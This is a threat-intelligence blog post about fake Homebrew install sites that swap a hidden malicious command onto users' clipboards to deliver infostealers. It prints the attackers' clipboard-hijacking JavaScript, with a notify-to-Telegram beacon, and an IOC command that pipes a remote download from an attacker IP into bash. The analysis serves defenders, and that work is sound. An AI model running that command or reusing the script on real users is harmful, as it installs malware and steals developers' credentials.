In September 2025, Kandji's security researchers identified multiple spoofed Homebrew installer sites designed to mimic the official brew.sh page. These replicas injected malicious payloads under the guise of a standard install. In this post, we examine the tactics, infrastructure, and impact of the campaign.
Seemingly every week, there’s panic about a package manager (NPM, PyPI, and others) allowing a typosquatted malicious package to slip through review, or a popular library getting hit by a supply-chain compromise.
By contrast, Homebrew, arguably the most widely used package manager on macOS, has seen no recent compromises.
Search and you’ll find nothing; the same can’t be said for NPM, where you’ll see dozens of articles about the Shai-Hulud package worm.
Does Homebrew have a better security review process (like their human review for Homebrew-core), or are threat actors just finding easier ways to compromise users?
Kandji Threat Intelligence has seen a recent increase in attackers using spoofed Homebrew webpages to get users to download malware. Just in the last week, we came across four Homebrew-related domains (homebrewoneline[.]org, and others.), all resolving to 38[.]146[.]27[.]144. These domains showed a carbon copy of the real Homebrew webpage at brew.sh.
Screenshot of the real Homebrew install page.
Screenshot of a spoofed Homebrew install page.
Rather than allowing users to highlight and copy the install command, the page forces them to use a single Copy button. That restriction is purposeful: it enables the attacker to inject an extra hidden command into the clipboard, outside of what is shown to the user on the webpage, which downloads a malicious payload in parallel with the Homebrew installer. This technique closely mirrors recent “ClickFix” social-engineering campaigns, where victims are coerced into pasting attacker-supplied shell commands (often under the pretense of solving a CAPTCHA). The result is a compact and effective initial infection vector.
What's Happening?
At the very bottom of the site’s index file we found embedded JavaScript. That script is where an attacker would place the designated malicious command, and where the page deliberately prevents users from simply selecting and copying the visible text.
This forces victims to use the provided Copy button. When that button is clicked, the script issues a POST request, sending a JSON payload to notify.php that logs the click time and other metadata back to the server. Russian-language comments in the code explicitly point to where the malicious command should be inserted and even suggest exfiltration destinations (for example, Telegram). That strongly suggests the page was built to serve malicious payloads as a service.
Combined with observed behavior of the same infrastructure downloading the Odyssey Stealer, the artifacts point to an active, commodity-style threat operation rather than a one-off.
Below is a screenshot showing the malicious command injected into the page, followed by the full JavaScript recovered from one of the hosting sites. In that instance, the threat actor hadn’t yet configured the command. However, before we published the post, it was updated to include a malicious, base64-encoded cURL payload.
// Эта команда будет копироваться по кнопке:
const copyCommand = 'echo '; // ← замени на нужную
(function () {
const block = document.getElementById('install-block');
if (!block) return;
block.addEventListener('contextmenu', function (e) { e.preventDefault(); }, { passive: false });
block.addEventListener('selectstart', function (e) { e.preventDefault(); }, { passive: false });
const inner = block.querySelector('.highlight');
if (inner) {
['copy','cut','dragstart'].forEach(function (evt) {
inner.addEventListener(evt, function (e) { e.preventDefault(); }, { passive: false });
});
}
})();
async function copyInstallCommand() {
try {
if (navigator.clipboard && window.isSecureContext) {
await navigator.clipboard.writeText(copyCommand);
} else {
const ta = document.createElement('textarea');
ta.value = copyCommand;
ta.setAttribute('readonly', '');
ta.style.position = 'absolute';
ta.style.left = '-9999px';
document.body.appendChild(ta);
ta.select();
document.execCommand('copy');
document.body.removeChild(ta);
}
} catch (err) {
console.error('Clipboard copy failed', err);
} finally {
// Отправляем уведомление на сервер (PHP -> Telegram)
try {
fetch('notify.php', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ event: 'copy_install_command', time: new Date().toISOString() })
});
} catch (e) { /* ignore */ }
}
}
const copyBtn = document.getElementById('copy-install-btn');
if (copyBtn) {
copyBtn.addEventListener('click', copyInstallCommand);
}
This isn’t the first time we’ve seen this tactic. Researcher Alden Schmidt and Intego documented the Cuckoo Stealer pivoting to fake Homebrew pages to trick users into installing an information stealer. In that case, the counterfeit Homebrew site hosted an installer script that mimicked the official install flow but contained malicious commands. The result is convincing: victims believe they’ve only installed Homebrew, while the attacker gains persistent access or exfiltrates secrets. Worryingly, some of these spoofed pages remain live for days or weeks before being taken down, increasing the window for infection.
Why does this matter?
Package managers like Homebrew are far more common on corporate developer machines than on casual users’ laptops. That concentration makes them an attractive target: compromising a developer’s machine can expose credentials, build systems, and internal artifacts, essentially a treasure trove for attackers. So it’s critical for developers, admins, and end users to treat not only the packages they install as sources of risk, but also the package managers themselves: always install them from official sources and verify any install instructions before running one-liner commands from the web.
The Threat Intelligence team at Kandji continuously monitors for new infection vectors so that we can provide customers with bleeding-edge protection in Kandji EDR. Below are just a few of these spoofed Homebrew domains, but many more exist and continue to spawn. We have also provided a link to a repo maintained by Mikhail Kasimov that contains many more known domains.
IOCs
Domains
homebrewfaq[.]org (active)
homebrewclubs[.]org
homebrewonline[.]org
homebrewupdate[.]org
Homebrewlub[.]com (active)
Command
curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash &
Domain Repo
https://github.com/stamparm/maltrail/blob/master/trails/static/malware/osx_atomic.txt
This campaign is a reminder that security risks aren’t limited to the packages being installed, the package managers themselves can be weaponized. Mitigation depends on questioning what looks familiar, verifying software sources, and safeguarding the systems developers rely on most. Kandji Threat Intelligence will continue tracking and surfacing threats like these, so your team stays ahead of what’s next.